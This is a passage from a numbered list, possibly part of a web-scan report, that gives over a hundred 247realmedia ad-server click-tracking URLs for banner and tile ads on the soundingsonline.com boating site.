20.244. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1601012463/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.245. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1603321405/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.246. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1608053131/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.247. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609075181/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.248. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.249. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1610500850/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.250. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616153881/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.251. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1616398296/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.252. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1643229148/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.253. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.254. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.255. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1657104294/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.256. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663724185/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.257. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1667705661/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.258. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1673101093/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.259. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1678402166/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.260. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.261. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.262. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1688500883/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.263. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1689508925/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.264. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1692333506/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.265. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.266. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697967302/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.267. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.268. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1703016407/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.269. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704233168/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.270. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1704986397/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.271. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.272. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

20.273. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.274. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.275. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1740615099/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.276. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1741696931/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.277. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1744721969/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.278. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1748961552/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.279. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1752314789/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.280. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1767100923/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.281. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/176837699/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.282. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1770472558/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.283. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1780672365/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.284. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790286706/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.285. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791372829/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.286. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1791697768/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.287. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1798360227/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.288. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1800046629/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.289. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1803110675/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.290. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.291. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.292. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.293. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.294. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.295. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.296. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.297. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.298. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.299. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.300. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.301. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.302. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.303. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.304. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.305. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.306. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.307. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921522918/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.308. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.309. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1923149033/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.310. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.311. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1927937446/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.312. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.313. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1931966763/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.314. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/193215144/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.315. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1938188771/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.316. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1942186617/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.317. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/194614025/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.318. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1949339220/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.319. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1953686413/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.320. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1955658996/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.321. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1956218158/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.322. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1960309178/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.323. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1966543230/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.324. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.325. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1988230146/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.326. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.327. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.328. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.329. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1993017733/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.330. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.331. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2003665576/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.332. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2011877321/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.333. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2018916786/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.334. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027917108/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.335. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2028781671/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.336. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2033280661/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.337. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2035051749/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.338. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.339. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039949584/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.340. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050539924/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.341. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2050849505/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.342. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2054216298/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.343. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2063106975/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.344. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2069352430/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.345. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2071009563/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.346. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2082217498/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.347. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2085906817/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.348. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2098585488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.349. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.350. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.351. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.352. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.353. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.354. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

20.355. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.356. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.357. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.358. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.359. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.360. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.361. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.362. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

20.363. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.364. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.365. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.366. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281105801/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.367. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.368. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.369. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.370. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/288726570/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.371. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/298788808/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

